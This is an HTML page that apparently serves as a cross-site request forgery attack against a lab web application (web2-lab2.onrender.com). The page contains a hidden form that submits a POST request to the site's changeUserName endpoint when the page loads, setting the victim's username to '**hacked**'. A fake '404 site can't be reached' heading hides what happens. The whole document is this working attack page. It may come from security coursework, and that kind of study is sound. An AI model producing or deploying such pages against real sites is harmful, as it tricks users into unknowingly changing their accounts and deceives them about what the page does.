<html>
    <body>
        <form action="https://web2-lab2.onrender.com/changeUserName" method="POST">
            <input type="hidden" name="username" id="username" value="**hacked**" />            
        </form>
        <script>
            window.onload=function(){
                setTimeout(document.forms[0].submit(),5000);
            }           
        </script>
        <h1>404 site can't be reached</h1>
    </body>
</html>